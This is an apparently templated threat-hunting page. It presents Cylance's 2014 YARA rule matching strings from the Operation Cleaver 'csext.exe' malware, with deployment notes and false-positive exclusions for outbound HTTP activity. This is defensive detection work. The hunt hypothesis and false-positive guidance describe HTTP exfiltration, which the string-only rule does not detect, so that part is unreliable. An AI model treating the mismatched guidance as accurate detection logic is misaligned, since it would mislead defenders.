http://cylance.com/opcleaver

Hunt Hypothesis

The hypothesis is that the observed activity may indicate an adversary attempting to exfiltrate data or establish a foothold by leveraging a compromised or malicious HTTP endpoint. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential lateral movement or data exfiltration attempts that may not be detected by traditional security controls.

YARA Rule

rule csext
{

  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"

  strings:
    $s1 = "COM+ System Extentions"
    $s2 = "csext.exe"
    $s3 = "COM_Extentions_bin"

  condition:
    all of them
}

Deployment Notes

This YARA rule can be deployed in the following contexts:

• Microsoft Defender for Endpoint — Custom indicators / advanced hunting
• Email Gateway — Attachment scanning
• File Share Monitoring — Periodic scanning of shared drives
• YARA CLI — Manual threat hunting on endpoints

This rule contains 3 string patterns in its detection logic.

• Source Rule

False Positive Guidance

• Scenario: A system administrator is using PowerShell to automate the deployment of a software update via a scheduled task.
  Filter/Exclusion: Exclude events where the process name is powershell.exe and the command line includes -Command with a script that matches known update deployment patterns.

• Scenario: A SQL Server Agent Job is running a script that connects to a remote HTTP endpoint to fetch configuration data.
  Filter/Exclusion: Exclude events where the process name is sqlagent.exe and the URL matches a known internal configuration endpoint.

• Scenario: A Windows Task Scheduler job is configured to run a legitimate tool like curl.exe or Invoke-WebRequest to pull a configuration file from a secure internal server.
  Filter/Exclusion: Exclude events where the process name is taskhostw.exe or schtasks.exe and the URL is within a predefined internal domain list.

• Scenario: A Docker container is running a service that makes outbound HTTP requests to a public API for license validation.
  Filter/Exclusion: Exclude events where the process name includes docker and the URL is a known license validation endpoint.

• Scenario: A Windows Update task is initiated by the Windows Update Agent to download and install patches from Microsoft.
  Filter/Exclusion: Exclude events where the process name is wuauserv.exe and the URL starts with https://download.microsoft.com.